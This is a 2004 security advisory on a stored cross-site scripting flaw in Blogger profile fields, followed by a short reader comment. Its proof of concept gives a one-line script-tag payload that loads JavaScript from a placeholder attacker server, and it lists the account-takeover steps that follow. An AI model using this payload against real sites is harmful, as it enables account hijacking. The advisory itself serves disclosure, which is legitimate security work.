Blogger XSS Vulnerability

26.03.2004

------------------------------------------------------
BLOGGER XSS VULNERABILITY
------------------------------------------------------
Online URL : http://ferruh.mavituna.com/article/?470
Severity : Moderately Critical for Members (Permanent Account Hijacking)

------------------------------------------------------
ABOUT BLOGGER;
------------------------------------------------------
Blogger is a web-based tool that helps you publish to the web instantly -- whenever the urge strikes. Blogger is the leading tool in the rapidly growing area of web publishing known as weblogs, or "blogs."

by Google (Pyra Labs acquired by Google)

------------------------------------------------------
XSS DETAILS;
------------------------------------------------------
There is no HTML filtering when user profiles are rendered, so anyone can inject script into profile fields such as "First Name" and "Last Name".

If you inject code into "First Name", it is printed and executed on the user's front page [www.blogger.com], so an attacker can easily take over the victim's account.



	------------------------------------------------------
	Proof Of Concept;
	------------------------------------------------------
	Inject [script src="http://[ATTACKER-SERVER]/EVIL-JS/"][/script] into the victim's "First Name" field.
	Now you can execute anything remotely.

	After logging in as your victim:
		  I. You can change the password (without the old password)
		 II. You can change the e-mail address without any confirmation
		III. You can take over the victim's blogs


	* Replace [ and ] with < and >
	* Script injection is limited to 50 characters (but that is plenty to include a remote JS script)


------------------------------------------------------
HISTORY;
------------------------------------------------------
Discovered : 2/22/2004
Vendor Informed : 2/25/2004
Published : 3/26/2004

------------------------------------------------------
VENDOR STATUS;
------------------------------------------------------
Contact established with Google but there is no answer.

Ferruh Mavituna
Web Application Security Specialist
http://ferruh.mavituna.com
ferruh[at]mavituna.com

Comments

I'm a little lost, to say the least, when it comes to this exploit. Playing around I created a blog @ blogger.com, but I do not understand your paper well enough to fully learn what this exploit does.

I mean ' http://[ATTACKER-SERVER]/EVIL-JS/"][/script]'

So I would assume that you mean that http://[ATTACKER-SERVER] is really http://www.blogger.com or some other blogging SQL site, but then you have /[EVIL-JS]/, which I assume is a file or a script? I'm just not sure at all!

So would one need to create the 'file' "evil-js.js" with the appropriate SQL call to send to the attack server? If so, then what would "evil-js" be, or what would the "evil java script" be? How does it "add" or "change" a password on such a big site as Blogger?

SolarisZen | 08.08.2007

© 2002-2007, Ferruh Mavituna
